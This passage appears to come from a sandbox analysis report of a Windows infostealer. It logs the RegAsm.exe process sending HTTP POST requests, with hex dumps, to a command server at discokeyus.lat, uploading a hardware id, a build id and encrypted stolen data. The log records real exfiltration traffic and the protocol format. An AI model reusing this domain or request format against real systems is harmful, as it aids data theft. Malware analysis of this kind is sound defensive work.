                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 45
                                                                                                      Host: discokeyus.lat
                                                                                                      2024-12-20 06:18:07 UTC45OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 44 55 6b 67 4c 76 2d 2d 74 61 78 26 6a 3d
                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=DUkgLv--tax&j=
                                                                                                      2024-12-20 06:18:08 UTC1129INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 20 Dec 2024 06:18:08 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=mqqr9g46h6fcnp61kogpmbhqt5; expires=Tue, 15 Apr 2025 00:04:47 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z6KIta1OMo50twfQN0DMsTBo%2F0AICd3oIM21L1%2FpiYM%2F%2FrPOzaUJInGsaKmJWYwZ5SbA0zKn3bswSdkgOijf0RIJZsAZqi%2BtBEgiaHr551PvDfGFybPAqtTsrPBaUS5U6Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f4d83689f790f8c-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1484&min_rtt=1478&rtt_var=567&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=943&delivery_rate=1906005&cwnd=212&unsent_bytes=0&cid=659ae6c122ccd87e&ts=778&x=0"
                                                                                                      2024-12-20 06:18:08 UTC240INData Raw: 34 36 36 0d 0a 75 56 59 50 30 2f 43 71 64 6c 54 63 76 52 76 2f 45 73 4a 69 2f 7a 57 6b 54 2f 78 30 62 35 62 62 41 38 4b 6c 36 61 65 32 34 53 4c 43 64 48 6e 78 79 70 35 61 64 71 2f 59 4f 63 56 6d 73 42 65 61 47 59 59 75 6d 46 5a 56 38 4c 70 76 73 63 44 46 68 63 43 4d 41 49 4d 77 62 72 2b 44 7a 31 70 32 75 63 55 35 78 55 6d 35 51 4a 70 62 68 6e 58 65 45 51 58 30 75 6d 2b 67 78 49 4c 49 78 6f 31 42 30 54 70 6f 75 35 58 4a 45 6a 57 77 30 48 36 61 64 36 4d 49 6b 56 7a 4a 4a 35 46 57 51 37 53 2b 65 65 43 66 79 2b 72 54 6c 55 50 30 4e 33 79 34 30 74 64 61 4c 2f 37 59 64 64 30 6f 34 41 4f 61 56 38 67 70 6d 42 38 48 2f 72 4e 6e 6f 63 47 44 31 39 2b 48 53 74 45 30 61 37 71 66 77 41 59 34 75 74 64 31 6e 48 32 6a 51 4e 4d
                                                                                                      Data Ascii: 466uVYP0/CqdlTcvRv/EsJi/zWkT/x0b5bbA8Kl6ae24SLCdHnxyp5adq/YOcVmsBeaGYYumFZV8LpvscDFhcCMAIMwbr+Dz1p2ucU5xUm5QJpbhnXeEQX0um+gxILIxo1B0Tpou5XJEjWw0H6ad6MIkVzJJ5FWQ7S+eeCfy+rTlUP0N3y40tdaL/7Ydd0o4AOaV8gpmB8H/rNnocGD19+HStE0a7qfwAY4utd1nH2jQNM
                                                                                                      2024-12-20 06:18:08 UTC893INData Raw: 58 77 54 58 65 54 6b 32 6e 69 32 4b 78 31 70 37 49 78 49 55 41 78 48 70 30 38 5a 58 45 56 47 37 2b 31 33 57 54 64 61 4d 50 6d 6c 62 47 50 35 45 57 44 76 79 78 5a 61 72 49 68 4d 72 61 69 55 66 54 50 57 71 2b 6c 63 41 53 4f 62 32 66 4e 39 31 33 75 45 44 46 46 2b 59 39 6e 52 55 5a 2b 61 67 68 76 34 6d 53 68 64 4f 50 41 49 4e 30 61 37 2b 54 78 52 51 6b 74 74 52 79 6d 47 4b 72 43 5a 42 61 78 69 43 55 47 51 37 30 76 6d 75 71 79 49 48 42 32 59 35 47 32 7a 51 74 2f 39 4c 50 44 48 62 6d 6e 31 71 59 59 4b 63 4d 69 78 58 38 62 59 46 59 46 4c 53 2b 62 65 43 66 79 38 33 52 67 45 50 51 4f 32 36 35 6d 64 6f 55 4a 4c 6a 53 66 49 39 32 70 51 36 58 56 4e 51 6e 6b 42 41 4f 2f 62 4a 6f 70 63 43 50 68 5a 72 44 52 38 4e 30 4e 66 47 7a 78 52 38 36 74 4d 68 35 33 57 2f 75 47 64
                                                                                                      Data Ascii: XwTXeTk2ni2Kx1p7IxIUAxHp08ZXEVG7+13WTdaMPmlbGP5EWDvyxZarIhMraiUfTPWq+lcASOb2fN913uEDFF+Y9nRUZ+aghv4mShdOPAIN0a7+TxRQkttRymGKrCZBaxiCUGQ70vmuqyIHB2Y5G2zQt/9LPDHbmn1qYYKcMixX8bYFYFLS+beCfy83RgEPQO265mdoUJLjSfI92pQ6XVNQnkBAO/bJopcCPhZrDR8N0NfGzxR86tMh53W/uGd
                                                                                                      2024-12-20 06:18:08 UTC1369INData Raw: 34 34 62 36 0d 0a 65 77 4e 5a 35 5a 79 43 71 49 56 68 4b 36 6f 43 47 6e 79 38 75 64 6c 49 78 50 31 44 78 74 73 4a 62 46 45 44 65 7a 30 33 43 65 66 4b 77 49 6b 46 76 43 49 70 59 65 44 76 79 72 62 36 37 42 6a 63 58 52 77 77 36 62 4d 33 58 78 79 6f 67 77 4f 4b 6e 4c 63 74 39 46 6f 77 36 54 55 4e 42 74 67 56 67 55 74 4c 35 74 34 4a 2f 4c 79 39 6d 49 54 4e 77 39 62 4c 4b 53 77 68 6f 35 74 4e 64 78 6e 58 32 68 43 35 56 52 79 79 61 52 47 51 72 38 75 6d 32 6c 79 6f 69 46 6d 73 4e 48 77 33 51 31 38 62 66 47 46 79 65 76 6e 55 79 65 66 71 34 48 69 78 66 5a 59 34 64 57 43 76 6a 35 4f 65 44 4e 6a 4d 4c 51 6a 6b 72 59 4d 47 6d 38 6e 63 45 64 50 36 7a 56 64 5a 4e 69 72 51 71 59 57 63 6f 6f 6b 52 59 4d 39 62 64 72 71 34 66 46 68 64 4f 62 41 49 4e 30 51 72 79 43 32 68 34
                                                                                                      Data Ascii: 44b6ewNZ5ZyCqIVhK6oCGny8udlIxP1DxtsJbFEDez03CefKwIkFvCIpYeDvyrb67BjcXRww6bM3XxyogwOKnLct9Fow6TUNBtgVgUtL5t4J/Ly9mITNw9bLKSwho5tNdxnX2hC5VRyyaRGQr8um2lyoiFmsNHw3Q18bfGFyevnUyefq4HixfZY4dWCvj5OeDNjMLQjkrYMGm8ncEdP6zVdZNirQqYWcookRYM9bdrq4fFhdObAIN0QryC2h4
                                                                                                      2024-12-20 06:18:08 UTC1369INData Raw: 39 31 33 75 45 44 46 46 2b 6b 75 69 42 78 4e 36 2f 64 34 34 4d 43 48 68 59 7a 44 53 74 63 77 62 72 32 62 78 42 6b 33 75 74 68 30 6d 58 43 6d 42 70 68 57 7a 53 57 53 47 51 66 34 76 57 32 70 77 59 66 47 31 34 55 41 6c 58 52 71 71 64 4b 51 56 42 65 7a 31 48 57 64 63 37 45 48 33 52 6d 47 49 35 67 57 54 61 79 76 63 62 66 41 6c 49 76 4e 77 30 66 58 64 44 58 78 6d 4e 6f 52 4f 4c 72 56 66 4a 6c 38 71 67 43 59 52 63 34 72 6d 52 6f 46 38 62 5a 6e 70 63 71 4d 7a 74 65 52 55 74 67 77 59 37 33 53 68 6c 51 78 70 70 38 68 33 56 57 33 41 34 31 52 78 57 32 42 57 42 53 30 76 6d 33 67 6e 38 76 46 32 6f 39 4c 33 44 39 6d 74 5a 62 49 47 54 32 77 30 58 43 52 65 4b 77 48 6a 31 72 44 4a 5a 51 66 43 50 69 30 59 72 4c 45 69 6f 57 61 77 30 66 44 64 44 58 78 74 66 73 6a 46 66 37 41
                                                                                                      Data Ascii: 913uEDFF+kuiBxN6/d44MCHhYzDStcwbr2bxBk3uth0mXCmBphWzSWSGQf4vW2pwYfG14UAlXRqqdKQVBez1HWdc7EH3RmGI5gWTayvcbfAlIvNw0fXdDXxmNoROLrVfJl8qgCYRc4rmRoF8bZnpcqMzteRUtgwY73ShlQxpp8h3VW3A41RxW2BWBS0vm3gn8vF2o9L3D9mtZbIGT2w0XCReKwHj1rDJZQfCPi0YrLEioWaw0fDdDXxtfsjFf7A
                                                                                                      2024-12-20 06:18:08 UTC1369INData Raw: 63 59 33 51 2b 47 41 5a 30 5a 42 72 53 6d 4c 37 6d 48 6a 4d 6d 55 32 77 44 63 50 47 57 2f 6b 63 34 66 4f 72 4c 65 63 4a 74 31 71 41 65 53 55 4d 38 71 6e 68 41 66 38 37 52 6f 6f 4d 79 43 7a 39 43 43 53 35 74 36 4c 62 61 4b 69 45 78 32 6a 4e 68 76 6a 58 50 67 48 39 4e 4f 68 69 71 53 56 6c 57 30 74 48 4f 68 77 70 6e 42 32 34 68 53 30 44 4a 74 74 49 44 50 47 44 79 78 33 48 47 51 63 36 67 53 6e 56 72 47 50 34 77 51 42 76 72 35 4c 2b 44 41 6b 34 57 4d 77 33 48 4d 50 79 32 75 33 4e 46 55 4d 62 4b 66 49 64 31 7a 71 67 32 54 52 63 49 72 6c 52 55 44 2f 4c 78 70 70 4d 32 47 79 74 2b 4a 53 64 4d 30 59 72 53 61 77 78 49 34 76 39 6c 31 6b 44 44 75 51 4a 70 50 68 6e 58 65 4d 52 66 35 76 33 61 78 38 6f 7a 46 68 63 4e 66 6c 53 30 74 74 70 36 49 54 48 61 7a 30 33 4f 51 64
                                                                                                      Data Ascii: cY3Q+GAZ0ZBrSmL7mHjMmU2wDcPGW/kc4fOrLecJt1qAeSUM8qnhAf87RooMyCz9CCS5t6LbaKiEx2jNhvjXPgH9NOhiqSVlW0tHOhwpnB24hS0DJttIDPGDyx3HGQc6gSnVrGP4wQBvr5L+DAk4WMw3HMPy2u3NFUMbKfId1zqg2TRcIrlRUD/LxppM2Gyt+JSdM0YrSawxI4v9l1kDDuQJpPhnXeMRf5v3ax8ozFhcNflS0ttp6ITHaz03OQd
                                                                                                      2024-12-20 06:18:08 UTC1369INData Raw: 58 32 57 4f 48 56 67 72 34 2b 54 6e 67 79 59 62 44 31 59 4a 49 30 7a 52 72 75 35 62 4c 48 54 57 35 31 6e 2b 57 63 36 6f 50 6d 6c 48 43 4c 5a 55 52 41 2f 4b 38 61 71 6d 48 78 59 58 54 6d 77 43 44 64 45 75 53 67 4e 6f 6d 4f 4c 33 45 4f 59 49 2b 75 55 43 61 57 34 5a 31 33 68 30 46 2b 36 74 6b 71 63 2b 50 7a 4e 53 48 53 74 59 7a 62 62 53 66 7a 52 41 34 75 74 68 35 6b 58 2b 6e 43 4a 4a 54 78 69 4c 65 57 45 33 7a 6f 53 48 34 68 36 76 4f 77 71 4a 4f 30 43 59 74 72 74 7a 52 56 44 47 79 6e 79 48 64 66 71 6b 42 6c 56 6e 4b 4a 5a 6f 45 44 66 2b 77 62 71 48 49 69 38 62 56 69 55 6a 4a 4d 6d 32 36 6d 73 38 63 4d 72 44 4e 65 4a 49 77 37 6b 43 61 54 34 5a 31 33 69 63 62 38 37 35 75 34 75 36 4d 33 74 57 4a 51 39 41 34 4c 61 37 63 30 56 51 78 73 70 38 68 33 58 32 73 44 5a
                                                                                                      Data Ascii: X2WOHVgr4+TngyYbD1YJI0zRru5bLHTW51n+Wc6oPmlHCLZURA/K8aqmHxYXTmwCDdEuSgNomOL3EOYI+uUCaW4Z13h0F+6tkqc+PzNSHStYzbbSfzRA4uth5kX+nCJJTxiLeWE3zoSH4h6vOwqJO0CYtrtzRVDGynyHdfqkBlVnKJZoEDf+wbqHIi8bViUjJMm26ms8cMrDNeJIw7kCaT4Z13icb875u4u6M3tWJQ9A4La7c0VQxsp8h3X2sDZ
                                                                                                      2024-12-20 06:18:08 UTC1369INData Raw: 6d 52 70 4e 72 50 6c 71 72 73 4b 4b 79 64 36 45 54 73 6b 31 5a 37 32 54 7a 78 4d 39 72 4e 52 72 6c 6e 69 6a 44 70 56 65 78 69 4f 65 46 77 44 30 2b 53 2f 67 77 4a 4f 46 6a 4d 4e 6c 2b 43 4e 37 75 39 44 72 41 79 43 30 32 48 57 4c 65 36 45 44 69 31 72 57 62 64 42 57 48 50 4f 6f 49 66 6a 52 6d 39 4c 54 6e 41 37 43 64 47 71 39 30 70 42 55 50 62 48 52 64 4a 5a 30 71 51 57 56 56 4d 4d 6f 6c 42 6f 42 39 62 46 6f 71 73 4b 4f 77 39 36 41 54 74 51 31 59 62 57 62 78 68 31 32 38 4a 39 2b 68 54 44 34 51 4b 74 48 77 54 57 54 42 6b 2f 47 75 6e 43 78 30 6f 62 56 30 73 46 76 32 44 68 75 74 4a 58 59 56 43 6e 77 78 6a 6d 61 66 4f 42 59 33 56 66 43 49 5a 30 52 41 2f 75 30 62 71 66 4d 68 4d 2f 61 6b 55 2f 65 50 47 47 35 6e 39 6f 65 50 4b 7a 57 63 4a 42 2b 71 42 4b 65 46 34 68
                                                                                                      Data Ascii: mRpNrPlqrsKKyd6ETsk1Z72TzxM9rNRrlnijDpVexiOeFwD0+S/gwJOFjMNl+CN7u9DrAyC02HWLe6EDi1rWbdBWHPOoIfjRm9LTnA7CdGq90pBUPbHRdJZ0qQWVVMMolBoB9bFoqsKOw96ATtQ1YbWbxh128J9+hTD4QKtHwTWTBk/GunCx0obV0sFv2DhutJXYVCnwxjmafOBY3VfCIZ0RA/u0bqfMhM/akU/ePGG5n9oePKzWcJB+qBKeF4h
                                                                                                      2024-12-20 06:18:08 UTC1369INData Raw: 2f 6d 34 59 71 36 46 75 74 50 5a 6b 30 50 65 4d 31 4f 50 6e 4d 38 41 4d 62 44 5a 65 64 30 2b 34 41 2f 64 44 2f 39 74 31 6c 59 79 75 76 6c 35 34 4a 2f 4c 38 4e 65 4e 54 74 77 69 66 50 79 78 33 77 49 38 70 5a 31 66 6d 6d 47 70 46 70 42 46 68 6d 50 65 45 45 32 73 36 53 2f 67 77 35 71 46 6a 4e 4d 53 67 47 45 2b 35 73 4b 61 43 33 69 6e 6e 32 2f 64 4b 50 4a 4f 33 55 57 47 64 64 35 52 44 75 61 72 5a 36 50 52 69 49 4c 71 76 57 44 51 49 6d 79 38 6d 63 51 71 43 4b 76 63 64 35 4e 33 74 68 48 64 47 59 59 69 33 6b 34 30 74 50 45 68 6e 34 6e 4c 33 5a 54 62 41 4f 34 33 59 37 2b 56 33 67 56 37 6e 74 52 76 6e 48 32 72 44 4e 39 57 79 7a 32 5a 56 6b 4f 30 76 79 48 34 6c 38 57 46 30 4a 49 41 67 32 51 2f 36 73 65 62 51 32 62 73 77 44 65 45 4d 4c 5a 41 78 51 57 49 62 59 78 57
                                                                                                      Data Ascii: /m4Yq6FutPZk0PeM1OPnM8AMbDZed0+4A/dD/9t1lYyuvl54J/L8NeNTtwifPyx3wI8pZ1fmmGpFpBFhmPeEE2s6S/gw5qFjNMSgGE+5sKaC3inn2/dKPJO3UWGdd5RDuarZ6PRiILqvWDQImy8mcQqCKvcd5N3thHdGYYi3k40tPEhn4nL3ZTbAO43Y7+V3gV7ntRvnH2rDN9Wyz2ZVkO0vyH4l8WF0JIAg2Q/6sebQ2bswDeEMLZAxQWIbYxW
                                                                                                      2024-12-20 06:18:08 UTC1369INData Raw: 65 78 69 72 37 47 78 59 42 41 30 48 51 6a 38 5a 53 49 54 47 54 77 6e 33 32 4d 4d 50 68 51 7a 77 79 54 66 73 6c 47 58 2b 76 33 65 4f 44 52 79 35 32 47 7a 51 44 4a 64 44 58 78 31 63 73 47 4a 4c 6a 63 62 35 34 33 6e 6a 36 37 56 4d 45 72 6e 52 67 61 35 66 74 4f 6f 38 79 48 79 64 4f 56 66 75 55 68 62 72 2b 63 7a 77 49 6e 2f 70 45 35 6b 6a 44 34 4f 64 31 47 7a 43 72 53 58 6b 48 6c 71 6d 2b 72 30 59 79 46 36 38 30 41 77 33 51 31 38 61 66 4c 47 6a 69 35 79 57 6a 51 56 71 4d 48 6d 31 54 49 4f 6f 39 57 51 37 53 2f 49 66 69 56 78 59 58 51 6b 67 43 44 5a 44 2f 71 78 35 74 44 5a 75 7a 41 4e 34 51 77 74 6b 44 46 42 49 68 74 6a 46 5a 56 74 50 35 76 72 63 61 49 79 39 65 52 55 74 30 33 65 37 4c 56 39 69 6f 54 73 39 4a 38 6b 33 65 65 50 72 78 64 31 69 43 52 45 54 50 4b 6a
                                                                                                      Data Ascii: exir7GxYBA0HQj8ZSITGTwn32MMPhQzwyTfslGX+v3eODRy52GzQDJdDXx1csGJLjcb543nj67VMErnRga5ftOo8yHydOVfuUhbr+czwIn/pE5kjD4Od1GzCrSXkHlqm+r0YyF680Aw3Q18afLGji5yWjQVqMHm1TIOo9WQ7S/IfiVxYXQkgCDZD/qx5tDZuzAN4QwtkDFBIhtjFZVtP5vrcaIy9eRUt03e7LV9ioTs9J8k3eePrxd1iCRETPKj


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.449739172.67.197.1704437432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-20 06:18:10 UTC275OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=H0SN1JZ0BCB5Z
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 18131
                                                                                                      Host: discokeyus.lat
                                                                                                      2024-12-20 06:18:10 UTC15331OUTData Raw: 2d 2d 48 30 53 4e 31 4a 5a 30 42 43 42 35 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 34 42 43 39 33 38 32 41 38 38 39 45 39 34 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 48 30 53 4e 31 4a 5a 30 42 43 42 35 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 30 53 4e 31 4a 5a 30 42 43 42 35 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 74 61 78 0d 0a 2d 2d 48 30 53 4e 31 4a 5a 30 42 43 42 35 5a
                                                                                                      Data Ascii: --H0SN1JZ0BCB5ZContent-Disposition: form-data; name="hwid"E4BC9382A889E941AC8923850305D13E--H0SN1JZ0BCB5ZContent-Disposition: form-data; name="pid"2--H0SN1JZ0BCB5ZContent-Disposition: form-data; name="lid"DUkgLv--tax--H0SN1JZ0BCB5Z
                                                                                                      2024-12-20 06:18:10 UTC2800OUTData Raw: 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77
                                                                                                      Data Ascii: ^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTw
                                                                                                      2024-12-20 06:18:11 UTC1128INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 20 Dec 2024 06:18:11 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=e1ft2u16dg0qtf3g3aqun50vei; expires=Tue, 15 Apr 2025 00:04:49 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9udr7feBRQgmhvBrrtGDRMQYz9M84CphRGCaRL7vt4psr8Ep7o%2BA3DuauZvzQdU8KdEFPR2P2aBrCFhA2D64PqHdzwvAJdUsfDFZrEhUEC08uRYuBROa82%2B0HO9A5TGwfQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f4d83767aee433a-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2529&min_rtt=2492&rtt_var=961&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2832&recv_bytes=19086&delivery_rate=1171749&cwnd=242&unsent_bytes=0&cid=56c3c644b7c88df7&ts=1246&x=0"
                                                                                                      2024-12-20 06:18:11 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2024-12-20 06:18:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.449740172.67.197.1704437432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-20 06:18:12 UTC271OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=U74AXY2RUB
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 8734
                                                                                                      Host: discokeyus.lat
                                                                                                      2024-12-20 06:18:12 UTC8734OUTData Raw: 2d 2d 55 37 34 41 58 59 32 52 55 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 34 42 43 39 33 38 32 41 38 38 39 45 39 34 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 55 37 34 41 58 59 32 52 55 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 37 34 41 58 59 32 52 55 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 74 61 78 0d 0a 2d 2d 55 37 34 41 58 59 32 52 55 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                      Data Ascii: --U74AXY2RUBContent-Disposition: form-data; name="hwid"E4BC9382A889E941AC8923850305D13E--U74AXY2RUBContent-Disposition: form-data; name="pid"2--U74AXY2RUBContent-Disposition: form-data; name="lid"DUkgLv--tax--U74AXY2RUBContent-Di
                                                                                                      2024-12-20 06:18:13 UTC1130INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 20 Dec 2024 06:18:13 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=bddomfroonioi9hu3371kumeif; expires=Tue, 15 Apr 2025 00:04:52 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a2w1YWyZf8d1E756P6JcEsjis5tQnWv0E0pm%2BvcLlKc3t1Lua9yoGxZT0Zg%2FnfURzPIeMerEkQ%2FDDOyhQ84iSY5q6jX%2BggD2l3ckfUf8t48yJopSJZrh6W5OODcce7OB2w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f4d8385ff304205-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=5095&min_rtt=1770&rtt_var=2816&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2833&recv_bytes=9663&delivery_rate=1649717&cwnd=252&unsent_bytes=0&cid=cb4a5f36cedbdd59&ts=849&x=0"
                                                                                                      2024-12-20 06:18:13 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2024-12-20 06:18:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      4192.168.2.449741172.67.197.1704437432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-20 06:18:14 UTC273OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=HOFL2KSKOEI
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 20393
                                                                                                      Host: discokeyus.lat
